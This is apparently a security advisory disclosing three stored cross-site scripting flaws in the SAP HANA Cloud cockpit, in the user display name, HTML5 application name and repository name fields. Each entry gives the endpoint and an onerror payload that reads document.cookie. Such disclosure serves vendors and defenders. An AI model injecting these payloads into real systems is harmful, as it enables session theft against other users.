SAP Hana Cloud Platform Cockpit Cross site Scripting Vulnerabilities


========================================================================
Vender: 
SAP

Product: 
SAP HANA CLoud

Vulnerability Type: 
Cross site scripting

Title: 
SAP Hana Cloud Cross scripting in User Display Name

Details: 
SAP Hana cloud allows any user with the least privileges to input arbitrary client side JS code into the Display Name parameter. Victim intervention is not required for the successful as the code is stored and execute in the browser upon viewing the victim's profile. 

Note: All webpages of the domain are affected

Vulnerable Parameter:
SAP Hana Cloud User Account Display Name "Display Name"

Method: 
POST

Exploit Code:
https://localhost/a/cockpit#/acc/[account-id]/accountmanagement

Post data
<name="Display Name" value="007"><img src=x onerror=prompt(document.cookie);>

Impact:
Since there is no requirement of Victim intervention, Session ID and data theft may follow as well as possibility to
bypass CSRF protections, injection of iframes to establish communication channels etc.

Severity Level:
Critical

------------------------------------------------------------------------

Vender: 
SAP

Product: 
SAP HANA CLoud

Vulnerability Type: 
Cross site scripting

Title: 
SAP Hana Cloud Cross site scripting in HTML5 Application Name

Details: 
SAP Hana cloud allows users to input arbitrary client side JS code into the HTML5 Application Name parameter. Victim intervention is not required for the successful as the code is stored and execute in the browser upon user edition of the HTML5 application 

Vulnerable Parameter:
SAP Hana Cloud HTML5 Application Name "Application Name"

Method: 
POST

Exploit Code:
https://localhost/a/cockpit#/acc/[account-id]/hcproxy

Post data
<name="Application Name" value="007"><img src=x onerror=prompt(document.cookie);>

Impact:
Since there is no requirement of Victim intervention, Session ID and data theft may follow as well as possibility to
bypass CSRF protections, injection of iframes to establish communication channels etc.

Severity Level:
Critical

------------------------------------------------------------------------

Vender: 
SAP

Product: 
SAP HANA CLoud

Vulnerability Type: 
Cross site scripting

Title: 
SAP Hana Cloud Cross scripting in Database Repository Name

Details: 
SAP Hana cloud allows users to input arbitrary client side JS code into the Database Repository Name parameter. Victim intervention is not required for the successful as the code is stored and execute in the browser upon user edition of the Database Repo application 

Vulnerable Parameter:
SAP Hana Cloud HTML5 Database Repository Name "Display Name"

Method: 
POST

Exploit Code:
https://localhost/a/cockpit#/acc/[account-id]/repositories/[repository-name]/ecmrepositorysettings

Post data
<name="Display Name" value="007"><img src=x onerror=prompt(document.cookie);>

Impact:
Since there is no requirement of Victim intervention, Session ID and data theft may follow as well as possibility to
bypass CSRF protections, injection of iframes to establish communication channels etc.

Severity Level:
Critical